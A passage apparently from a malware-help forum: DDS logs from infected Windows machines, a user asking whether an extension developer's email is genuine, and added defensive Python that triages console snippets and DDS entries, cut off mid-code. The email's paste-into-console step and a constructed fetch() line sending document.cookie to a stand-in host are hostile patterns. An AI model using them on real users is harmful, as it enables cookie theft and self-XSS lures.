2016-12-09 09:57:01 1852720 ----a-w- C:\WINDOWS\SysWow64\mfmp4srcsnk.dll
2016-12-09 09:57:00 6668040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2016-12-09 09:56:15 959112 ----a-w- C:\WINDOWS\SysWow64\ole32.dll
2016-12-09 09:52:21 1435896 ----a-w- C:\WINDOWS\SysWow64\user32.dll
2016-12-09 09:52:21 1415752 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2016-12-09 09:51:08 117240 ----a-w- C:\WINDOWS\SysWow64\sspicli.dll
2016-12-09 09:47:29 22563328 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2016-12-09 09:45:47 40448 ----a-w- C:\WINDOWS\System32\WordBreakers.dll
2016-12-09 09:45:43 206848 ----a-w- C:\WINDOWS\System32\win32k.sys
2016-12-09 09:42:29 227328 ----a-w- C:\WINDOWS\System32\cdd.dll
2016-12-09 09:41:22 380928 ----a-w- C:\WINDOWS\System32\wincorlib.dll
2016-12-09 09:41:06 32768 ----a-w- C:\WINDOWS\SysWow64\WordBreakers.dll
2016-12-09 09:40:38 147968 ----a-w- C:\WINDOWS\SysWow64\win32k.sys
2016-12-09 09:38:39 324608 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:37:29 261632 ----a-w- C:\WINDOWS\System32\indexeddbserver.dll
2016-12-09 09:37:10 411136 ----a-w- C:\WINDOWS\System32\facecredentialprovider.dll
2016-12-09 09:37:01 49152 ----a-w- C:\WINDOWS\System32\Windows.UI.Shell.dll
2016-12-09 09:36:56 425984 ----a-w- C:\WINDOWS\System32\aadcloudap.dll
2016-12-09 09:36:32 410112 ----a-w- C:\WINDOWS\System32\AppXDeploymentClient.dll
2016-12-09 09:36:09 3059200 ----a-w- C:\WINDOWS\System32\msi.dll
2016-12-09 09:36:05 231936 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.LockScreen.dll
2016-12-09 09:36:02 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-12-09 09:34:52 822784 ----a-w- C:\WINDOWS\SysWow64\Chakradiag.dll
2016-12-09 09:34:31 288768 ----a-w- C:\WINDOWS\SysWow64\wincorlib.dll
2016-12-09 09:33:42 3777536 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2016-12-09 09:33:37 1589760 ----a-w- C:\WINDOWS\System32\msdtctm.dll
2016-12-09 09:32:18 635904 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2016-12-09 09:31:22 3689984 ----a-w- C:\WINDOWS\SysWow64\msi.dll
2016-12-09 09:31:20 198656 ----a-w- C:\WINDOWS\SysWow64\indexeddbserver.dll
2016-12-09 09:31:11 313856 ----a-w- C:\WINDOWS\SysWow64\AppXDeploymentClient.dll
2016-12-09 09:30:32 19413504 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2016-12-09 09:30:31 4612608 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.dll
2016-12-09 09:29:51 4749312 ----a-w- C:\WINDOWS\System32\SettingsHandlers_nt.dll
2016-12-09 09:28:55 1004544 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2016-12-09 09:28:12 3306496 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2016-12-09 09:27:55 5114368 ----a-w- C:\WINDOWS\System32\cdp.dll
2016-12-09 09:27:36 981504 ----a-w- C:\WINDOWS\System32\Windows.Security.Authentication.OnlineId.dll
2016-12-09 09:26:32 8129536 ----a-w- C:\WINDOWS\System32\Chakra.dll
2016-12-09 09:26:01 1692672 ----a-w- C:\WINDOWS\System32\AppXDeploymentExtensions.onecore.dll
2016-12-09 09:25:28 376832 ----a-w- C:\WINDOWS\System32\CryptoWinRT.dll
2016-12-09 09:24:21 2275840 ----a-w- C:\WINDOWS\System32\AppXDeploymentServer.dll
2016-12-09 09:22:27 1490944 ----a-w- C:\WINDOWS\System32\lsasrv.dll
2016-12-09 09:22:06 2820096 ----a-w- C:\WINDOWS\System32\InputService.dll
2016-12-09 09:22:02 2688512 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2016-12-09 09:21:48 4746752 ----a-w- C:\WINDOWS\System32\jscript9.dll
2016-12-09 09:21:42 3616768 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2016-12-09 09:21:31 1512960 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2016-12-09 09:21:04 716800 ----a-w- C:\WINDOWS\System32\ShareHost.dll
2016-12-09 09:20:36 730624 ----a-w- C:\WINDOWS\System32\fveapi.dll
2016-12-09 09:20:35 3198464 ----a-w- C:\WINDOWS\SysWow64\cdp.dll
2016-12-09 09:20:33 6044160 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2016-12-09 09:20:32 172544 ----a-w- C:\WINDOWS\System32\DeviceEnroller.exe
2016-12-09 09:20:05 187392 ----a-w- C:\WINDOWS\System32\mdmregistration.dll
2016-12-09 09:19:46 433664 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2016-12-09 09:19:45 1121280 ----a-w- C:\WINDOWS\System32\aadtb.dll
2016-12-09 09:19:43 261120 ----a-w- C:\WINDOWS\System32\Windows.UI.Core.TextInput.dll
2016-12-09 09:19:32 85504 ----a-w- C:\WINDOWS\System32\EditBufferTestHook.dll
.
============= FINISH: 12:29:27.29 ===============

Attached Files
File Type: txt attach.txt (3.6 KB)
File Type: txt dds.txt (39.5 KB)

Flash® Player for YouTube™ has been updated

Hi,
I have received the email below and would like to know if it is genuine or someone trying to get into my PC?
Regards, Brobilly

Flash® Player for YouTube™ has been updated

Bookmark this page if you don't have time to read it now or if you want to retrieve the instructions it contains later!
What's new

This version brings improvements and is compatible with the upcoming Material Design version of YouTube™.
Chrome has started blocking Flash® content!

If you use Chrome version 53 or later you have probably noticed that Flash® content has become click-to-play on a multitude of websites. Even if Google™ is making a temporary exception for popular websites like YouTube™, it has planned to phase out the whitelist over time to finally make HTML5 the default experience! Take a few seconds to give five stars to Flash® Player for YouTube™ here to let Google know that there are people who still rely on Flash® Player to watch YouTube™ videos because their devices don't easily support the default HTML5 player. Here are a few samples of what you can write if you're not inspired:
  • Useful extension. My device consumes less CPU and RAM resources with Flash® Player than with the default HTML5 player.
  • Useful extension. My device doesn't easily support HTML5 videos.
  • Useful extension. I cannot watch HD videos without Flash® Player.
  • Useful extension. Flash® Player performs better than the default HTML5 player on my device.
Support the development of Flash® Player for YouTube™

If you have already rated and reviewed this extension but want to do more you can make a donation below, any amount is appreciated!
Amount: Currency: Improve your user experience on YouTube™

My other extension, Enhancer for YouTube™, has all the features you need to improve your user experience on YouTube™. It is used by hundreds of thousands of users who have rated it 4.74/5 and who have posted hundreds of positive reviews. It is really easy to use and allows you to control volume level and playback speed with the mouse wheel, remove ads from videos (automatically or on-demand), remove annotations, disable autoplay and preloading for videos loaded in background tabs, automatically play videos in HD or any other format, loop videos (in part or in whole), and much more... So take a few seconds to try it, it's really worth it!
How to try out the Material Design version of YouTube™

Note: The Material Design version is still in development. If you don't see the new version after having followed these instructions it means that YouTube™ refuses to let you try it out.
  • Right-click on the following link and select Open link in incognito window from the context menu: https://www.youtube.com/?hl=US&gl=US
  • Open the Developers Tools in the incognito window by pressing F12 on your keyboard.
  • Select the Application tab, expand the Storage > Cookies menu in the left column, right-click on https://www.youtube.com and click on Clear to delete cookies (see image below).

  • Copy the following code: document.cookie="VISITOR_INFO1_LIVE=xc20BSxO5Uc; path=/; domain=.youtube.com";window.location.reload();
  • Select the Console tab, click on the blue arrow or in the blank area, paste the code copied above, then press Enter on your keyboard (see image below).

  • Close the Developers Tools by pressing F12 on your keyboard.
That's it, you should be able to try out the new version of YouTube™ before it is released to the public!
-----
The Developer
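Before pasting anything an unsolicited email tells you to into the DevTools console, it is worth seeing exactly what the snippet does. The following Python is an added example (not code from the email, the extension or this forum): it splits a one-line console snippet into statements, parses a `document.cookie` assignment into name, value and attributes, and flags constructs that read data off the page and send it somewhere else. The risky-pattern list and the second, exfiltrating snippet are constructed for the example.

```python
"""Triage a 'paste this into the DevTools console' snippet before running it.

Splits the snippet into statements, parses any document.cookie assignment
into name, value and attributes, and flags constructs that read data off
the page or send it somewhere else.
"""
import re

# The one-liner quoted in the email above.
EMAIL_SNIPPET = (
    'document.cookie="VISITOR_INFO1_LIVE=xc20BSxO5Uc; path=/; '
    'domain=.youtube.com";window.location.reload();'
)

# Constructed counter-example (not from the email): reads the cookies and
# ships them to a third-party host, then reloads to hide the tracks.
EXFIL_SNIPPET = (
    'fetch("https://collector.example/c?d="'
    '+encodeURIComponent(document.cookie));window.location.reload();'
)

# Constructs worth a second look. This list is an assumption of the
# example, not an exhaustive rule set.
RISKY = {
    "cookie_read": re.compile(r"document\.cookie(?!\s*=[^=])"),
    "network": re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b"),
    "image_beacon": re.compile(r"new\s+Image\s*\("),
    "eval": re.compile(r"\b(eval|Function)\s*\("),
    "decode": re.compile(r"\batob\s*\("),
    "storage_read": re.compile(r"\b(localStorage|sessionStorage)\.(getItem|key)\b"),
}

COOKIE_WRITE = re.compile(r"document\.cookie\s*=\s*([\"'])(.*)\1\s*$")
RELOAD = re.compile(r"location\.reload\s*\(")


def split_statements(js):
    """Split on ';' outside string literals (enough for one-line snippets)."""
    out, buf, quote = [], [], None
    for ch in js:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'`":
            quote = ch
            buf.append(ch)
        elif ch == ";":
            if "".join(buf).strip():
                out.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    if "".join(buf).strip():
        out.append("".join(buf).strip())
    return out


def parse_cookie_string(cookie):
    """Parse 'name=value; attr=val; flag' the way document.cookie accepts it."""
    parts = [p.strip() for p in cookie.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def triage(js):
    """Return what a snippet writes, whether it reloads, and what it reads/sends."""
    report = {"cookie_writes": [], "reloads": 0, "flags": set()}
    for stmt in split_statements(js):
        if m := COOKIE_WRITE.match(stmt):
            cookie = parse_cookie_string(m.group(2))
            domain = cookie["attrs"].get("domain")
            # A leading-dot Domain attribute makes the cookie visible to every
            # subdomain; without it the cookie is bound to the current host.
            cookie["scope"] = ("all subdomains of " + domain.lstrip(".")
                               if isinstance(domain, str) and domain
                               else "current host only")
            cookie["session"] = not ({"expires", "max-age"} & cookie["attrs"].keys())
            report["cookie_writes"].append(cookie)
        elif RELOAD.search(stmt):
            report["reloads"] += 1
        else:
            for label, pattern in RISKY.items():
                if pattern.search(stmt):
                    report["flags"].add(label)
    # Reading page data plus a way to send it is the shape of a self-XSS
    # "paste this in your console" lure; flag the combination explicitly.
    reads = {"cookie_read", "storage_read"} & report["flags"]
    sends = {"network", "image_beacon"} & report["flags"]
    report["exfiltration"] = bool(reads and sends)
    return report
```

Run on the quoted snippet, `triage` reports one cookie write (`VISITOR_INFO1_LIVE`, session cookie, scoped to all subdomains of youtube.com) and one reload, with no read or network flag; on the constructed counter-example it reports `exfiltration`. The splitter only understands one-line snippets with simple string literals, which is the form these instructions usually take.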

Your TV Link

All my browsers are infected with Yourtv.link, which redirects pages and blocks normal browser behavior. I scan with Malwarebytes Anti-Malware and AdwCleaner; they both find it, but cleaning doesn't fix the problem. As soon as I open any browser, it is back. Here are the log files, if they could be of some help.

https://www.sendspace.com/file/gbkmn5

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 11.111.2
Run by Suad at 10:10:20 on 2016-12-29
Microsoft Windows XP Professional 5.1.2600.3.1250.381.1033.18.1527.607 [GMT 1:00]
.
AV: Avira Antivirus *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Running Processes ================
.
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\Antivirus\sched.exe
C:\Documents and Settings\Suad\Application Data\AVAST Software\Browser Cleanup\BCUSched.exe
C:\Program Files\Avira\Antivirus\avguard.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\ThpSrv.exe
C:\Program Files\TOSHIBA\TME3\Tmesrv31.exe
C:\Program Files\Avira\Launcher\Avira.ServiceHost.exe
C:\Program Files\Avira\Antivirus\avshadow.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\SkyTel.EXE
C:\WINDOWS\system32\00THotkey.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\thpsrv.exe
C:\WINDOWS\system32\TFNF5.exe
C:\Program Files\TOSHIBA\TouchED\TouchED.Exe
C:\Program Files\TOSHIBA\Wireless Hotkey\TosHKCW.exe
C:\WINDOWS\System32\DLA\DLACTRLW.EXE
C:\Program Files\TOSHIBA\TME3\TMEEJME.EXE
C:\Program Files\Intel\Wireless\bin\ZCfgSvc.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\system32\igfxext.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Avira\Antivirus\avgnt.exe
C:\Program Files\Avira\Launcher\Avira.Systray.exe
C:\Documents and Settings\Suad\Application Data\uTorrent\uTorrent.exe
C:\Program Files\Internet Download Manager\IDMan.exe
C:\Documents and Settings\Suad\Application Data\uTorrent\updates\3.4.9_43085\utorrentie.exe
C:\Documents and Settings\Suad\Application Data\uTorrent\updates\3.4.9_43085\utorrentie.exe
C:\Program Files\Internet Download Manager\IEMonitor.exe
C:\Program Files\CCleaner\CCleaner.exe
C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
C:\Documents and Settings\All Users\iobakf\iobakf.exe
C:\Program Files\EmEditor\emedtray.exe
C:\WINDOWS\system32\OSK.exe
C:\WINDOWS\system32\MSSWCHX.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k imgsvc
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://yourtv.link
uSearch Bar = hxxps://www.google.com/?bcutc=sp-004-752
uSearch Page = hxxps://www.google.com/search?bcutc=sp-004-752&q={searchTerms}
mStart Page = hxxps://www.google.com/?bcutc=sp-004-752
mSearch Bar = hxxps://www.google.com/?bcutc=sp-004-752
mSearch Page = hxxps://www.google.com/search?bcutc=sp-004-752&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class): {0055C089-8582-441B-A0BF-17B458C2A3A8} - c:\program files\internet download manager\IDMIECC.dll
BHO: DriveLetterAccess: {5CA3D70E-1895-11CF-8E15-001234567890} - c:\windows\system32\dla\DLASHX_W.DLL
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre1.8.0_111\bin\ssv.dll
BHO: Windows Live Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
uRun: [uTorrent] "c:\documents and settings\suad\application data\utorrent\uTorrent.exe" /MINIMIZED
uRun: [Adobe Reader Synchronizer] "c:\program files\adobe\reader 11.0\reader\AdobeCollabSync.exe"
uRun: [IDMan] c:\program files\internet download manager\IDMan.exe /onboot
uRun: [CCleaner Monitoring] "c:\program files\ccleaner\CCleaner.exe" /MONITOR
uRun: [iobakf.exe] c:\documents and settings\all users\iobakf\iobakf.exe
mRun: [SkyTel] SkyTel.EXE
mRun: [00THotkey] c:\windows\system32\00THotkey.exe
mRun: [000StTHK] 000StTHK.exe
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [AGRSMMSG] AGRSMMSG.exe
mRun: [TPSODDCtl] TPSODDCtl.exe
mRun: [ThpSrv] thpsrv /logon
mRun: [TFNF5] TFNF5.exe
mRun: [TouchED] c:\program files\toshiba\touched\TouchED.Exe
mRun: [TOSDCR] TOSDCR.EXE
mRun: [TMESRV.EXE] c:\program files\toshiba\tme3\TMESRV31.EXE /Logon
mRun: [TosHKCW.exe] "c:\program files\toshiba\wireless hotkey\TosHKCW.exe"
mRun: [DLA] c:\windows\system32\dla\DLACTRLW.EXE
mRun: [IntelZeroConfig] "c:\program files\intel\wireless\bin\ZCfgSvc.exe"
mRun: [IntelWireless] "c:\program files\intel\wireless\bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [avgnt] "c:\program files\avira\antivirus\avgnt.exe" /min
mRun: [Avira SystrayStartTrigger] c:\program files\avira\launcher\Avira.SystrayStartTrigger.exe
dRun: [CTFMON.EXE] c:\windows\system32\CTFMON.EXE
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\emeditor.lnk - c:\program files\emeditor\emedtray.exe
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\micros~1.lnk - c:\program files\microsoft office\office11\ONENOTEM.EXE
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\suad.lnk - c:\documents and settings\all users\iobakf\iobakf.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
uPolicies-Explorer: NoDriveAutoRun = dword:67108863
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Windows\System: Allow-LogonScript-NetbiosDisabled = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:323
mPolicies-Explorer: NoDriveAutoRun = dword:67108863
IE: Download all links with IDM - c:\program files\internet download manager\IEGetAll.htm
IE: Download with IDM - c:\program files\internet download manager\IEExt.htm
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
Trusted Zone: localhost
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_67-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0067-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_67-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_67-windows-i586.cab
TCP: Interfaces\{3D613E94-4D96-4B66-A027-6D91900CFB7C} : NameServer = 8.8.8.8 4.2.2.2
TCP: Interfaces\{DC1F581B-B8C1-4CD4-8530-19D911DCD677} : NameServer = 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\49.0.2623.112\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
Hosts: 0.0.0.0 fr.a2dfp.net
Hosts: 0.0.0.0 m.fr.a2dfp.net
Hosts: 0.0.0.0 mfr.a2dfp.net
Hosts: 0.0.0.0 ad.a8.net
Hosts: 0.0.0.0 asy.a8ww.net
.
Note: multiple HOSTS entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\documents and settings\suad\application data\mozilla\firefox\profiles\aex6lj8q.default-1473001184500\
FF - prefs.js: browser.search.defaulturl - hxxps://www.google.com/search?bcutc=sp-004-752
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - hxxp://yourtv.link
FF - prefs.js: keyword.URL - hxxps://www.google.com/search?bcutc=sp-004-752
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\google\update\1.3.32.7\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\nokia\nokia suite\npNokiaSuiteEnabler.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 Thpdrv;TOSHIBA HDD Protection Driver;c:\windows\system32\drivers\thpdrv.sys [2004-12-27 16384]
R0 Thpevm;TOSHIBA HDD Protection - Shock Sensor Driver;c:\windows\system32\drivers\Thpevm.sys [2006-6-6 6144]
R1 avkmgr;avkmgr;c:\windows\system32\drivers\avkmgr.sys [2015-8-8 37896]
R1 IDMTDI;IDMTDI;c:\windows\system32\drivers\idmtdi.sys [2016-1-28 140936]
R1 TMEI3E;TMEI3E;c:\windows\system32\drivers\TMEI3E.SYS [2006-6-6 5888]
R2 AntiVirSchedulerService;Avira Scheduler;c:\program files\avira\antivirus\sched.exe [2015-8-8 470600]
R2 AntiVirService;Avira Real-Time Protection;c:\program files\avira\antivirus\avguard.exe [2015-8-8 470600]
R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2015-8-8 115600]
R2 Avira.ServiceHost;Avira Service Host;c:\program files\avira\launcher\Avira.ServiceHost.exe [2016-7-11 309384]
R2 Skype C2C Service;Skype C2C Service;c:\documents and settings\all users\application data\skype\toolbars\skype c2c service\c2c_service.exe [2013-10-9 3275136]
R2 Tmesrv;Tmesrv3;c:\program files\toshiba\tme3\TMESRV31.EXE [2006-6-6 114688]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-10-2 24448]
R3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-7-20 754856]
S2 AntiVirWebService;Avira Web Protection;c:\program files\avira\antivirus\avwebgrd.exe [2016-10-25 1253352]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 MBAMService;MBAMService;c:\program files\malwarebytes anti-malware\mbamservice.exe [2014-4-8 1136608]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2016-9-20 324224]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [2014-1-5 1691480]
S3 anvsnddrv;AnvSoft Virtual Sound Device;c:\windows\system32\drivers\anvsnddrv.sys --> c:\windows\system32\drivers\anvsnddrv.sys [?]
S3 IFXTPM;IFXTPM;c:\windows\system32\drivers\ifxtpm.sys [2006-6-6 35968]
S3 Revoflt;Revoflt;c:\windows\system32\drivers\revoflt.sys [2016-2-23 27064]
S4 AntiVirMailService;Avira Mail Protection;c:\program files\avira\antivirus\avmailc.exe [2016-10-25 970632]
S4 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes anti-malware\mbamscheduler.exe [2014-4-8 1514464]
.
=============== File Associations ===============
.
FileExt: .txt: emeditor.txt="c:\program files\emeditor\EMEDITOR.EXE" "%1"
.js: <filetype is not registered>
ShellExec: opera.exe: open="c:\program files\opera\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2016-12-29 09:04:33 -------- d-----w- c:\documents and settings\all users\application data\Estsoft
2016-12-27 19:54:02 -------- d-----w- c:\documents and settings\suad\application data\AVAST Software
2016-12-27 12:46:32 -------- d-----w- C:\2-click run
2016-12-26 17:12:38 -------- d-sh--w- c:\documents and settings\all users\Mozilla
2016-12-20 09:19:46 -------- d-sh--w- c:\documents and settings\all users\Windows XP
2016-12-20 09:05:38 -------- d-sh--w- c:\documents and settings\all users\iobakf
2016-12-14 08:02:58 3709120 ----a-w- c:\program files\mozilla firefox\d3dcompiler_47.dll
.
==================== Find3M ====================
.
2016-12-29 07:39:39 170200 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-12-21 12:16:43 802904 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2016-12-21 12:16:42 144472 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2016-11-22 09:07:17 95808 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
2016-11-22 09:07:09 160256 ----a-w- c:\windows\system32\javacpl.cpl
2016-11-08 21:30:09 5001920 ----a-w- c:\windows\system32\FlashPlayerInstaller.exe
.
============= FINISH: 10:17:24,78 ===============


I suppose I picked this thing up on a well-known Bulgarian torrent site.

Attached Files
File Type: txt attach.txt (519.6 KB)
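To triage a DDS log like the one above without reading it line by line, here is an added Python example (mine, not part of the original post and not part of DDS): it parses the Pseudo HJT Report lines, flags Run and Startup entries whose target lives in a user-writable directory, start and search pages outside an allow-list, and file associations that hand script extensions to a script host, then groups persistence hits by executable. The sample lines are copied from the log above plus one constructed `FileExt` line for `.jse`; the directory markers, allowed domains and script-extension list are assumptions of the example.

```python
"""Triage the 'Pseudo HJT Report' section of a DDS log.

Flags autorun entries whose target lives in a user-writable location,
browser start/search pages that are not on an allow-list, and file
associations that hand script extensions to a script host. Hits are
leads to check, not verdicts: legitimate software also runs out of
the user profile.
"""
import re
from collections import defaultdict

# Constructed sample: lines copied from the XP log above, plus one
# FileExt line of the kind DDS prints under "File Associations".
SAMPLE_LOG = r"""
uStart Page = hxxp://yourtv.link
uSearch Bar = hxxps://www.google.com/?bcutc=sp-004-752
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
uRun: [uTorrent] "c:\documents and settings\suad\application data\utorrent\uTorrent.exe" /MINIMIZED
uRun: [iobakf.exe] c:\documents and settings\all users\iobakf\iobakf.exe
mRun: [ThpSrv] thpsrv /logon
mRun: [avgnt] "c:\program files\avira\antivirus\avgnt.exe" /min
StartupFolder: c:\docume~1\suad\startm~1\programs\startup\suad.lnk - c:\documents and settings\all users\iobakf\iobakf.exe
FF - prefs.js: browser.startup.homepage - hxxp://yourtv.link
FileExt: .txt: emeditor.txt="c:\program files\emeditor\EMEDITOR.EXE" "%1"
.js: <filetype is not registered>
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
"""

# Directory heuristics and allow-lists are this example's assumptions.
TRUSTED_PREFIXES = (r"c:\windows\system32", r"c:\windows\syswow64",
                    r"c:\program files")
USER_WRITABLE = ("documents and settings", "\\users\\", "application data",
                 "appdata", "programdata", "all users", "\\temp\\")
ALLOWED_PAGE_DOMAINS = ("google.com", "bing.com")
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1"}

# A quoted path, else an unquoted path up to its extension, else one token.
TARGET_RE = re.compile(
    r'"([^"]+)"|(.+?\.(?:exe|dll|scr|com|bat|cmd|vbs|js|jse|lnk)\b|\S+)', re.I)
RUN_RE = re.compile(r"^[umd]Run: \[(.+?)\] (.+)$")
STARTUP_RE = re.compile(r"^StartupFolder: (\S+) - (.+)$")
PAGE_RE = re.compile(
    r"^([umd](?:Start Page|Search Bar|Search Page|Default_Page_URL)) = (.+)$")
FF_PAGE_RE = re.compile(
    r"^FF - prefs\.js: (browser\.startup\.homepage|browser\.search\.defaulturl|keyword\.URL) - (.+)$")
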